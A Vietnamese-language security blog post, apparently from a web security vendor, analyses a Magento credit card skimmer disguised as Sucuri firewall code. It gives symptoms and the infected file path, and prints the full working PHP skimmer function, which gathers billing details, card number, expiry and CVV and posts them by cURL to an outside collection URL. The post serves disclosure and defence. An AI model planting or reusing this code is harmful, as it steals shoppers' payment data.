Với các biện pháp khóa COVID-19 và chương trình giảm giá BFCM &Giáng sinh sắp diễn ra trên toàn cầu, mua sắm trực tuyến tiếp tục tăng cao trong năm nay và cùng với đó là các cuộc tấn công thẻ tín dụng kỹ thuật số.
Sau báo cáo gần đây của chúng tôi về chiến dịch phần mềm độc hại Telegram, các nhà nghiên cứu bảo mật tại Astra Security đã phát hiện ra một chiến dịch phần mềm độc hại lướt qua thẻ tín dụng đang diễn ra khác mạo danh công ty bảo mật ‘Sucuri’ để lấy cắp thông tin nhạy cảm của khách hàng từ các cửa hàng thương mại điện tử bị nhiễm. Tuy nhiên, mặc dù chúng tôi đã theo dõi phần mềm độc hại này nhắm mục tiêu vào các cửa hàng Magento, một số dấu vết của phần mềm độc hại đã được phát hiện trong các CMS khác như Prestashop, OpenCart &WooCommerce.
Tấn công lướt qua thẻ tín dụng kỹ thuật số là gì?
Cuộc tấn công lướt qua thẻ tín dụng kỹ thuật số là một cuộc tấn công lướt web dựa trên web trong đó tin tặc đưa mã JavaScript độc hại vào các trang web hoặc cửa hàng thương mại điện tử để lây nhiễm phần mềm độc hại cho chúng và cuối cùng là đánh cắp thông tin xác thực và thông tin thanh toán nhạy cảm từ khách truy cập trang web / khách hàng. Mã độc hại của kỹ thuật số này chủ yếu được đặt tại các biểu mẫu nhập của người dùng có trong trang thanh toán của trang web. Mã này đánh cắp thông tin nhập của người dùng hoặc tạo iframe với các hình thức thanh toán giả để lấy cắp thông tin thẻ tín dụng của khách hàng.
Tính năng đọc lướt kỹ thuật số đã ảnh hưởng đến hàng trăm nghìn trang web cho đến nay, bao gồm các thương hiệu nổi tiếng như British Airways, Macy’s, Forbes, NewEgg và Ticketmaster.
Các triệu chứng của phần mềm độc hại lướt qua thẻ tín dụng Magento
- Khách hàng phàn nàn về các giao dịch không xác định từ thẻ tín dụng của họ sau khi sử dụng thẻ trên cửa hàng của bạn.
- Email từ nhà cung cấp dịch vụ thanh toán / ngân hàng của bạn để cảnh báo về tính bảo mật của cổng thanh toán của cửa hàng bạn.
- Đã thêm phương thức thanh toán bổ sung vào cửa hàng mà bạn không xác định được.
- Mã chứa thuật ngữ 'Sucuri' được thêm vào trang web của bạn, ngay cả khi bạn không sử dụng bất kỳ sản phẩm nào có tên này.
Cách tin tặc nhắm mục tiêu vào các cửa hàng và mạo danh tường lửa Sucuri để lừa người dùng cung cấp thông tin thanh toán của họ
Trong quá trình phân tích chiến dịch phần mềm độc hại này, nhóm nghiên cứu của chúng tôi phát hiện ra rằng tin tặc đang tích cực đưa phần mềm độc hại lướt qua thẻ tín dụng này vào các trang web thương mại điện tử (chủ yếu là cửa hàng Magneto) và lừa khách truy cập trang web hoặc người mua nhập thông tin nhạy cảm của họ trong quá trình thanh toán. Mã skimmer thẻ tín dụng độc hại nằm ở vị trí tệp này /app/code/core/Mage/Payment/Model/Method/Cc.php của một trang web bị nhiễm.
Tại đây, những kẻ tấn công đang thêm một hàm $this->sucuri_encrypted(); cho phép họ lọc dữ liệu do người dùng nhập trong quá trình thanh toán. Và dữ liệu được lọc ra đang được gửi đến https://www.thebrandstore.gr/js/i.php
Dữ liệu bị đánh cắp chứa thông tin nhạy cảm của khách hàng bao gồm tên, họ, địa chỉ, số điện thoại và chi tiết thẻ tín dụng của họ.
Dưới đây là mẫu mã được những kẻ tấn công sử dụng trong chiến dịch phần mềm độc hại này:
function sucuri_encrypted()
{
$info = $this->getInfoInstance();
$object = new Mage_Checkout_Block_Onepage_Billing;
$address1 = $object->getQuote()->getBillingAddress();
$data1 = $address1->getFirstname();
$data2 = $address1->getLastname();
$data3 = $address1->getStreet(1);
$data4 = $address1->getStreet(2);
$data5 = $address1->getCity();
$data6 = $address1->getRegion();
$data7 = $address1->getPostcode();
$data8 = $address1->getCountry();
$data9 = $address1->getTelephone();
$data10 = $info->getCcNumber();
$expyear = substr($info->getCcExpYear(), -2);
$expmonth = $info->getCcExpMonth();
if (strlen($expmonth) == 1) {
$expmonth = '0'.$expmonth;
};
$data11 = $expmonth;
$data12 = $expyear;
$data13 = $info->getCcCid();
$data15 = $_SERVER['SERVER_NAME'];
$data16 = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
//create array of data to be secured
$sucuri_firewall['firstname'] = base64_encode($data1);
$sucuri_firewall['lastname'] = base64_encode($data2);
$sucuri_firewall['address'] = base64_encode($data3);
$sucuri_firewall['address2'] = base64_encode($data4);
$sucuri_firewall['city'] = base64_encode($data5);
$sucuri_firewall['state'] = base64_encode($data6);
$sucuri_firewall['zip'] = base64_encode($data7);
$sucuri_firewall['country'] = base64_encode($data8);
$sucuri_firewall['phone'] = base64_encode($data9);
$sucuri_firewall['cc'] = base64_encode($data10);
$sucuri_firewall['exp'] = base64_encode($data11);
$sucuri_firewall['expyear'] = base64_encode($data12);
$sucuri_firewall['cvv'] = base64_encode($data13);
$sucuri_firewall['email'] = base64_encode($data16);
$sucuri_firewall['dari'] = base64_encode($data15);
$sucuri_firewall['submit'] = 'Submit';
//traverse array and prepare data for posting (key1=value1)
foreach ( $sucuri_firewall as $key => $value) {
$post_items[] = $key . '=' . $value;
}
//create the final string to be posted using implode()
$post_string = implode ('&', $post_items);
//create cURL connection
$curl_connection = curl_init('https://www.thebrandstore.gr/js/i.php');
//set options
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
//set data to be posted
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);
//perform our request
$result = curl_exec($curl_connection);
curl_close($curl_connection);
}
}
}.
Như bạn có thể thấy trong đoạn mã trên, kẻ đánh cắp thông tin thẻ tín dụng thêm một chức năng có tên $this->sucuri_encrypted(); hiển thị mã tường lửa Sucuri bị mạo danh.
Cách bảo vệ cửa hàng thương mại điện tử của bạn khỏi phần mềm độc hại này
Các trang web thương mại điện tử hoặc cửa hàng bị nhiễm phần mềm độc hại này có thể bị thiệt hại lớn về doanh thu cũng như sự tin tưởng của khách hàng do thông tin nhạy cảm của khách hàng bị đánh cắp ở đây và các đơn đặt hàng hợp pháp không được đặt hoặc thanh toán không được thực hiện. Vì vậy, chủ sở hữu trang web nên thực hiện các biện pháp bảo mật trước để bảo vệ trang web và dữ liệu khách hàng của họ trước loại skimmer thẻ tín dụng này và bất kỳ chiến dịch phần mềm độc hại nào khác.
Nếu bạn đang sử dụng tường lửa ứng dụng của Astra Security thì cửa hàng thương mại điện tử của bạn đã được bảo vệ khỏi cuộc tấn công này cũng như các cuộc tấn công mạng và lỗ hổng bảo mật khác như SQLi, XSS, CSRF, LFI, RFI, hack thẻ tín dụng, spam, bot xấu, v.v. Hơn nữa, Các chuyên gia bảo mật từ lâu đã khuyến nghị quét phần mềm độc hại thường xuyên như một biện pháp bảo mật quan trọng để đảm bảo an toàn cho các trang web.